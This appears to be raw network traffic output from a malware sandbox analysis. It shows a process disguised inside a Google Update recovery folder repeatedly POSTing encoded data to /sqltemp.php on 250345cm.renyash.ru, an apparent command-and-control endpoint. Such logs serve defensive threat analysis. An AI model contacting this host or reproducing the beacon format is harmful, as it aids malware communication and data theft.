                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  9 | 192.168.2.6 | 62436 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:21.662587881 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:22.022550106 CET | 1124 | OUT | Data Raw: 56 50 5a 54 54 59 54 55 58 56 52 59 56 51 59 51 5b 52 54 5f 55 5e 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VPZTTYTUXVRYVQYQ[RT_U^P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[&/%]7<-\$.'8:273+)?T='#*+)1,#-&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:22.110033035 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:22.368505001 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E3%2BudHspWeH4H8dUk83z1qcr5jhn6ZcyAN1b6BCl8o%2FgPjcCPL1grklnMDXhRlyj8ukTjpR5mqPWo%2BKdva6GZBW0aa5HzXUeKJCMcMbj9I2w0MCNgkwFzI93gzWEhaLhGZqoAre%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363d3eaff8ce0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2663&min_rtt=1906&rtt_var=2230&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=183209&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0
                                                                                                                  Jan 1, 2025 16:02:22.376399994 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:22.472697973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:22.473480940 CET | 1964 | OUT | Data Raw: 53 54 5a 51 54 59 54 57 58 56 52 59 56 5e 59 54 5b 5f 54 59 55 5b 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: STZQTYTWXVRYV^YT[_TYU[P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.$/]4Y>'/92!-<:(*.+!2+52?:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:22.773247004 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hzzDt1CPwyhXgWBGZiDMzHEzPggi0CPe6VdB5ths0TH02KhigYM1pjW5jMHlVpuiUpcsjNQ9fkkuSbevkC5vDvjaacttKo9zoxRlQ1fXhui4K8f2o7VYqua3HM53agx9rEVL8WLF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363d62d6e8ce0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5272&min_rtt=1906&rtt_var=6778&sent=9&recv=11&lost=0&retrans=0&sent_bytes=857&recv_bytes=3644&delivery_rate=1487519&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 08 3d 3d 3d 0d 25 0c 27 00 28 04 30 0e 32 2e 29 00 28 38 31 06 33 3d 2f 58 29 3a 2c 01 36 3c 0f 5f 26 5e 24 59 37 13 09 12 33 34 2b 59 05 1c 20 08 35 01 02 59 2a 03 3b 59 26 11 31 13 33 3e 3f 07 2a 28 0d 0f 23 28 23 5b 26 2d 37 05 3e 39 23 0c 26 3c 34 03 2e 59 21 1d 33 3a 2c 54 00 11 25 0d 27 0f 23 04 23 27 28 5b 21 31 18 01 26 37 36 1b 25 3c 0d 54 20 2a 31 05 25 32 30 00 21 1d 22 11 26 05 26 04 23 2e 2f 55 2a 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&===%'(02.)(813=/X):,6<_&^$Y734+Y 5Y*;Y&13>?*(#(#[&-7>9#&<4.Y!3:,T%'##'([!1&76%<T *1%20!"&&#./U*%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  10 | 192.168.2.6 | 62443 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:22.524871111 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:22.875992060 CET | 1124 | OUT | Data Raw: 56 55 5f 5c 54 5c 51 51 58 56 52 59 56 50 59 5e 5b 5e 54 5f 55 5a 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_\T\QQXVRYVPY^[^T_UZP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y$<9] /$8V4.0[()+V)X<!2?Y?+"2?U-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:22.989694118 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:23.305875063 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6bT1d7RuvHI7eXFH7yyeNlbYDrUFTi9dNSQf3Pj7uslI6JVmeu7jseCYZepW%2FoLwzm6crjvNzCjVWTO5fcmiyPNMwCwM0zm1EEdSVQ8HqzJnO%2B%2BT%2FkKsnU3peRZgvV1mV5KbqQpt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363d9692a4393-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8054&min_rtt=1758&rtt_var=13252&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=28006&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  11 | 192.168.2.6 | 62451 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:23.428395033 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:23.785437107 CET | 1124 | OUT | Data Raw: 56 5f 5f 50 54 5c 51 55 58 56 52 59 56 5c 59 52 5b 5c 54 5f 55 5e 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V__PT\QUXVRYV\YR[\T_U^PZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.$&4=_3#/\140[(S)$Z41+*8)B$/V.&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:23.870918989 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:24.158406973 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QTPEHslymt9g9vdDd5RvUQWJyfbkF0hNGtg%2FQJUpdYB%2FpTO00%2BkWyQ7pCpYpy80Qht0l6YMdDr9wqTjRCWXfQde5PZQVm%2BBhRnBb970kDzHj6rU8jFEN%2FerUWwNqFnwVO80YVtBc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363dee929f791-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2308&min_rtt=1524&rtt_var=2139&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=187251&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  12 | 192.168.2.6 | 62458 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:24.306349993 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:24.657216072 CET | 1124 | OUT | Data Raw: 53 54 5f 54 54 58 51 50 58 56 52 59 56 5b 59 55 5b 5e 54 59 55 5a 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_TTXQPXVRYV[YU[^TYUZPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&<5 10.,)!U >8_?*><\#'](62:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:02:24.761190891 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:24.974467993 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:25.018347979 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vP59QyCWzAjqLUZTbbqXI2euXlbIM7HofppWPd24rXGvB8zsL4UTQwcproqmD13dzLXYl5u5yrLcNxA9PB7D%2Bju%2Bazcj1mWFCFFQpPa82nFtr%2BVfdfWhxjGgxsiLayY3FjjVFGwD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363e479304213-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4291&min_rtt=2422&rtt_var=4646&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=84028&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 62464 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:25.149293900 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:25.500757933 CET | 1124 | OUT | Data Raw: 53 52 5a 57 51 58 51 51 58 56 52 59 56 50 59 54 5b 53 54 5c 55 5d 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SRZWQXQQXVRYVPYT[ST\U]PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&/)[713;C89S 0**8=(Y73(C%4.&Y.,Y-
Jan 1, 2025 16:02:25.624682903 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:25.881412983 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGr6IQoPR%2FTNb1USl%2Fu7ZuWQZf9o0yN1lSUmvHyeYhygfvfaz4PWFoRm%2FyML0Fo9%2FHxsiK26P5G%2B0E4FuocaqoRECNyWrO7coMfhL%2BhWG21YVFWfWwyz%2BB4w7EsYTm5u37KzSewD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363e9cf0943c8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4348&min_rtt=1753&rtt_var=5848&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=64837&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 62469 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:26.008424997 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:26.373981953 CET | 1124 | OUT | Data Raw: 56 50 5f 5d 54 59 54 51 58 56 52 59 56 5c 59 53 5b 5b 54 5f 55 59 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VP_]TYTQXVRYV\YS[[T_UYP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^&,!#?=\'X$,"4.<+*><X #Y(&1?;-*&Y.,Y-5
Jan 1, 2025 16:02:26.473244905 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:26.740102053 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lBQlDTg0LgWMB0PFBE3xcxXlnqa92VKbrYMHwHSYyh7%2Byq7RbwWdMzh91ldiEUya6DVO%2F4Cbsd%2FLxOLjg6OOM6OjmsPNy39XnnL7syl0f3VO9%2FzjCaj9TgDn590U7k8VSkeVprrU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363ef2fe443e9-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4808&min_rtt=1799&rtt_var=6692&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=56433&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 62475 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:26.874149084 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:27.219669104 CET | 1124 | OUT | Data Raw: 56 52 5f 5c 54 50 54 53 58 56 52 59 56 58 59 56 5b 5c 54 5f 55 5c 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_\TPTSXVRYVXYV[\T_U\PZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.['/!X#%]3C/%V7=,_?90) (?)@&/?U-:&Y.,Y-%
Jan 1, 2025 16:02:27.317828894 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:27.593163967 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFkPCLZC69uCuURuVMwgHCJTv0NKKW4zpUIgcfqvPfajhoEE98R%2FV5N7LL5WccOkt%2F3Cayk4xgGZmidOmHNceOKd2GkOwt%2BiIOsN46uHUe54Mok0VLsbk8S02mU5KAxO5gU5kJQf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363f47ddc7298-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4415&min_rtt=2000&rtt_var=5580&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=68470&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 62483 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:27.736412048 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 62484 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:27.793709993 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:28.141597033 CET | 1964 | OUT | Data Raw: 56 54 5f 5d 51 5d 54 52 58 56 52 59 56 5e 59 5f 5b 5a 54 51 55 54 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_]Q]TRXVRYV^Y_[ZTQUTPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y'/:7<&$-$,*9T#=(+)'S=$ 2,(+.$/'R-:&Y.,Y-
Jan 1, 2025 16:02:28.238744020 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:28.421642065 CET | 949 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:28 GMT
